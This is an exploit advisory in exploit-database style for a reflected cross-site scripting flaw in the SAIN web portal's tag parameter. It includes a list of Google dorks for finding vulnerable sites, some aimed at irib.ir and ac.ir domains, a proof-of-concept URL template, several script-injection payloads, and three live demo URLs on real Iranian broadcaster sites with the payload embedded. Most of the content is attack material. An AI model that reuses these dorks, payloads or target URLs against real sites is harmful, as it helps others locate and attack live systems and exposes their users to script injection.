[+] Title: SAIN tags Cross Site Scripting (XSS)
[+] Date: 2020-03-28
[+] Author: h4shur
[+] Vendor Homepage: www.sain.ir
[+] Software Link: www.sain.ir
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: p_r_p_564233524_tag=
[+] Vulnerable Parameter: Get Method
[+} Dorks : inurl:p_r_p_564233524_tag= intext:تهیه شده در سپهر افزار ایرانیان
inurl:p_r_p_564233524_tag= intext:"تهیه شده در سپهر افزار ایرانیان"
inurl:p_r_p_564233524_tag= intext:"Documents with tag"
inurl:p_r_p_564233524_tag= intext:"پیوندها با کلیدواژه"
inurl:p_r_p_564233524_tag= intext:پیوندها با کلیدواژه
inurl:p_r_p_564233524_tag= intext:پورتال
inurl:p_r_p_564233524_tag= intext:مدارک
inurl:p_r_p_564233524_tag= intext:دیجیتال
inurl:p_r_p_564233524_tag= inurl:p_r_p_564233524_categoryId=
inurl:p_r_p_564233524_tag= intext:پیوند ها
inurl:p_r_p_564233524_tag= intext:ورودی
inurl:p_r_p_564233524_tag= inurl:/document_library/
inurl:p_r_p_564233524_tag= inurl:/web/
inurl:p_r_p_564233524_tag= inurl:/guest/
inurl:p_r_p_564233524_tag= inurl:/en/
inurl:p_r_p_564233524_tag=
inurl:p_r_p_564233524_tag= inurl:/recent-documents
inurl:p_r_p_564233524_tag= inurl:p_p_col_id
inurl:p_r_p_564233524_tag= inurl:p_p_mode
inurl:p_r_p_564233524_tag= inurl:p_p_state
inurl:p_r_p_564233524_tag= inurl:p_p_lifecycle
inurl:p_r_p_564233524_tag= inurl:p_p_id
inurl:p_r_p_564233524_tag= inurl:/news
inurl:p_r_p_564233524_tag= site:irib.ir
inurl:p_r_p_564233524_tag= intext:شبکه
inurl:p_r_p_564233524_tag= site:ac.ir
### POC:
[+} http://Site/[Folders]?p_p_id=[]&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=[]&p_p_col_count=[]&p_r_p_564233524_tag=[XSS]
### Xss Alert Code: "><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] http://bojnourd.irib.ir/home?p_p_id=101_INSTANCE_2NNOTUBiK3gi&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=_118_INSTANCE_ByPAmMqGX9dp_column-1&p_p_col_count=1&p_r_p_564233524_tag=%27%3E%3Cscript%3Ealert(%27%27);%3C/script%3E
[+] http://majlestv.ir/web/fars697740/%D9%86%D9%85%D8%A7%DB%8C%D8%B4-%D9%85%D8%AD%D8%AA%D9%88%D8%A7%DB%8C-%D8%AA%D9%84%D9%88%DB%8C%D8%B2%DB%8C%D9%88%D9%86?p_p_id=101_INSTANCE_ugRs8EYqvk8c&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_564233524_tag=%27%3E%3Cscript%3Ealert(%27%27);%3C/script%3E
[+] http://fars.irib.ir/%D9%86%D9%85%D8%A7%DB%8C%D8%B4-%D9%85%D8%AD%D8%AA%D9%88%D8%A7%DB%8C-%D8%AA%D9%88%D9%84%DB%8C%D8%AF%D8%A7%D8%AA-%D9%88%DB%8C%DA%98%D9%87?p_p_id=101_INSTANCE_ugRs8EYqvk8c&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_564233524_tag=%27%3E%3Cscript%3Ealert(%27%27);%3C/script%3E
### Special Thanks:
* Persian Security Group
* Po0ri4 & b4ckdo0r
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur